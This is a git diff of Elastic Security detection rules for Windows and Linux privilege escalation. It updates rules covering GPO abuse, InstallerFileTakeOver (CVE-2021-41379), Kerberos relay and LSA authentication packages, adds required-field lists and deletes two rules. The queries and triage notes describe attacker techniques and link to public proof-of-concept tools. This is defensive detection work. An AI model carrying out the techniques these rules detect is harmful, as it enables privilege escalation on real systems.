@@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_privileged_groups.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_privileged_groups.json index 2e77e602e2e9f..6923d779d8dce 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_privileged_groups.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_privileged_groups.json @@ -10,14 +10,32 @@ "language": "kuery", "license": "Elastic License v2", "name": "Group Policy Abuse for Privilege Addition", - "note": "## Triage and analysis\n\n### Investigating Group Policy Abuse for Privilege Addition\n\nGroup Policy Objects (GPOs) can be used to add rights and/or modify Group Membership on GPOs by changing the contents of an INF\nfile named GptTmpl.inf, which is responsible for storing every setting under the Security Settings container in the GPO.\nThis file is unique for each GPO, and only exists if the GPO contains security settings.\nExample Path: \"\\\\DC.com\\SysVol\\DC.com\\Policies\\{PolicyGUID}\\Machine\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf\"\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity\nis legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `GptTmpl.inf` file, and under the `Privilege Rights` section, look for potentially\ndangerous high privileges, for example: SeTakeOwnershipPrivilege, SeEnableDelegationPrivilege, etc.\n- Inspect the user security identifiers (SIDs) associated with these privileges, and if they should have these privileges.\n\n### False positive analysis\n\n- Inspect whether the user that has done the modifications should be allowed to. The user name can be found in the\n`winlog.event_data.SubjectUserName` field.\n\n### Related rules\n\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n\n## Config\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nDS Access > \nAudit Directory Service Changes (Success,Failure)\n```\n", - "query": "event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:\"gPCMachineExtensionNames\" and \nwinlog.event_data.AttributeValue:(*827D319E-6EAC-11D2-A4EA-00C04F79F83A* and *803E14A0-B4FB-11D0-A0D0-00A0C90F574B*)\n", + "note": "## Triage and analysis\n\n### Investigating Group Policy Abuse for Privilege Addition\n\nGroup Policy Objects (GPOs) can be used to add rights and/or modify Group Membership on GPOs by changing the contents of an INF\nfile named GptTmpl.inf, which is responsible for storing every setting under the Security Settings container in the GPO.\nThis file is unique for each GPO, and only exists if the GPO contains security settings.\nExample Path: \"\\\\DC.com\\SysVol\\DC.com\\Policies\\{PolicyGUID}\\Machine\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf\"\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity\nis legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `GptTmpl.inf` file, and under the `Privilege Rights` section, look for potentially\ndangerous high privileges, for example: SeTakeOwnershipPrivilege, SeEnableDelegationPrivilege, etc.\n- Inspect the user security identifiers (SIDs) associated with these privileges, and if they should have these privileges.\n\n### False positive analysis\n\n- Inspect whether the user that has done the modifications should be allowed to. The user name can be found in the\n`winlog.event_data.SubjectUserName` field.\n\n### Related rules\n\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.", + "query": "event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:\"gPCMachineExtensionNames\" and\nwinlog.event_data.AttributeValue:(*827D319E-6EAC-11D2-A4EA-00C04F79F83A* and *803E14A0-B4FB-11D0-A0D0-00A0C90F574B*)\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", "https://labs.f-secure.com/tools/sharpgpoabuse" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "b9554892-5e0e-424b-83a0-5aef95aa43bf", + "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_scheduled_task.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_scheduled_task.json index 34e4c0610e1a9..49b6277a81a60 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_scheduled_task.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_scheduled_task.json @@ -10,8 +10,8 @@ "language": "kuery", "license": "Elastic License v2", "name": "Scheduled Task Execution at Scale via GPO", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled\nby a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml`\nfile.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity\nis legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any\npotentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nObject Access > \nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nDS Access > \nAudit Directory Service Changes (Success,Failure)\n```\n", - "query": "(event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and \n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*)) \nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled\nby a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml`\nfile.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity\nis legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any\npotentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "(event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", "https://github.com/atc-project/atc-data/blob/f2bbb51ecf68e2c9f488e3c70dcdd3df51d2a46b/docs/Logging_Policies/LP_0029_windows_audit_detailed_file_share.md", @@ -19,8 +19,46 @@ "https://twitter.com/menasec1/status/1106899890377052160", "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_gpo_scheduledtasks.yml" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessList", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.RelativeTargetName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ShareName", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -68,5 +106,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_installertakeover.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_installertakeover.json index dfcba2aa7e546..ce3a23b423b4e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_installertakeover.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_installertakeover.json @@ -12,13 +12,46 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via InstallerFileTakeOver", - "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an\nunprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself\nto the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked),\nwhich is outside the scope of this rule.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "/* This rule is compatible with both Sysmon and Elastic Endpoint */\n\nprocess where event.type == \"start\" and \n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n (process.name : \"elevation_service.exe\" and \n not process.pe.original_file_name == \"elevation_service.exe\") or\n\n (process.parent.name : \"elevation_service.exe\" and \n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\")) \n )\n", + "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an\nunprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself\nto the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked),\nwhich is outside the scope of this rule.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "/* This rule is compatible with both Sysmon and Elastic Endpoint */\n\nprocess where event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n )\n", "references": [ "https://github.com/klinix5/InstallerFileTakeOver" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_service_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_service_creation.json index 7cd11fbf31640..ba74a93e1fda4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_service_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_service_creation.json @@ -18,6 +18,53 @@ "https://github.com/cube0x0/KrbRelay", "https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + }, + { + "ecs": false, + "name": "winlog.event_data.AuthenticationPackageName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "e4e31051-ee01-4307-a6ee-b21b186958f4", "severity": "high", @@ -69,5 +116,5 @@ } ], "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_suspicious_logon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_suspicious_logon.json deleted file mode 100644 index 05f7e52ade03c..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_suspicious_logon.json +++ /dev/null @@ -1,72 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-system.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Potential Privilege Escalation via Local Kerberos Relay over LDAP", - "query": "authentication where\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally via relayed kerberos ticket */\n winlog.event_data.AuthenticationPackageName : \"Kerberos\" and winlog.logon.type == \"Network\" and\n source.ip == \"127.0.0.1\" and source.port > 0 and\n\n /* Impersonate Administrator user via S4U2Self service ticket */\n winlog.event_data.TargetUserSid : \"S-1-5-21-*-500\"\n", - "references": [ - "https://github.com/Dec0ne/KrbRelayUp", - "https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html", - "https://github.com/cube0x0/KrbRelay" - ], - "risk_score": 73, - "rule_id": "3605a013-6f0c-4f7d-88a5-326f5be262ec", - "severity": "high", - "tags": [ - "Elastic", - "Host", - "Windows", - "Threat Detection", - "Privilege Escalation", - "Credential Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1548", - "name": "Abuse Elevation Control Mechanism", - "reference": "https://attack.mitre.org/techniques/T1548/", - "subtechnique": [ - { - "id": "T1548.002", - "name": "Bypass User Account Control", - "reference": "https://attack.mitre.org/techniques/T1548/002/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1558", - "name": "Steal or Forge Kerberos Tickets", - "reference": "https://attack.mitre.org/techniques/T1558/" - } - ] - } - ], - "type": "eql", - "version": 1 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ld_preload_shared_object_modif.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ld_preload_shared_object_modif.json index 45644e9a4f021..1e681c7108c6e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ld_preload_shared_object_modif.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ld_preload_shared_object_modif.json @@ -15,6 +15,23 @@ "references": [ "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "717f82c2-7741-4f9b-85b8-d06aeb853f4f", "severity": "medium", @@ -51,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_linux_strace_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_linux_strace_activity.json deleted file mode 100644 index a649bcd3ac487..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_linux_strace_activity.json +++ /dev/null @@ -1,51 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Strace is a useful diagnostic, instructional, and debugging tool. This rule identifies a privileged context execution of strace which can be used to escape restrictive environments by instantiating a shell in order to elevate privileges or move laterally.", - "false_positives": [ - "Strace is a dual-use tool that can be used for benign or malicious activity. Some normal use of this command may originate from developers or SREs engaged in debugging or system call tracing." - ], - "from": "now-9m", - "index": [ - "auditbeat-*", - "logs-endpoint.events.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Strace Process Activity", - "query": "event.category:process and event.type:(start or process_started) and process.name:strace\n", - "references": [ - "https://en.wikipedia.org/wiki/Strace" - ], - "risk_score": 21, - "rule_id": "d6450d4e-81c6-46a3-bd94-079886318ed5", - "severity": "low", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection", - "Privilege Escalation" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1068", - "name": "Exploitation for Privilege Escalation", - "reference": "https://attack.mitre.org/techniques/T1068/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 8 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_local_user_added_to_admin.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_local_user_added_to_admin.json index 72c3bfc9a520c..36f17ffc44666 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_local_user_added_to_admin.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_local_user_added_to_admin.json @@ -15,6 +15,28 @@ "references": [ "https://managingosx.wordpress.com/2010/01/14/add-a-user-to-the-admin-group-via-command-line-3-0/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "565c2b44-7a21-4818-955f-8d4737967d2e", "severity": "medium", @@ -51,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_lsa_auth_package.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_lsa_auth_package.json index 9b5ae8b997b74..9d02b4420ef6c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_lsa_auth_package.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_lsa_auth_package.json @@ -11,6 +11,23 @@ "license": "Elastic License v2", "name": "Potential LSA Authentication Package Abuse", "query": "registry where event.type == \"change\" and\n registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Authentication Packages\" and\n /* exclude SYSTEM SID - look for changes by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb", "severity": "medium", @@ -69,5 +86,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_sudo_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ml_linux_anomalous_sudo_activity.json similarity index 100% rename from 